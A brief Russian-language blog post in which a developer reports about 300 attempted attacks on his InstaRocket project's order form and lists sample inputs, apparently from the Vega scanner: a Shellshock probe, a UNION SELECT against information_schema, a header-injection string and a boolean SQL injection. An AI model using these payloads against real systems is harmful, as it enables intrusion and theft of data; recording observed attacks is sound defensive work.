Home
Login
Register
New post
Sign in / Sign up
Menu
Denys Bilozor
http://bilozor.com
Попытка SQL injection
January 25, 2018
View 19

    Как только проект начинает набирать популярность, и у него там более 1000 клиентов, ему пытаются сделать SQL injection (так сказать, взломать). Попытка была через форму заказа и там попыток 300 было.

    Go go InstaRocket!

    Примеры запросов и как они должны были себя повести:
    () { :; }; printf 'Content-Type: text/json\r\n\r\n%s vulnerable %s' 'VEGA123' 'VEGA123'

    1' UNION SELECT 8, table_name, 'vega' FROM information_schema.tables WHERE table_name like'%

    vega@example.combogusVega-Inject:bogus

    vega@example.com AND 1=2 --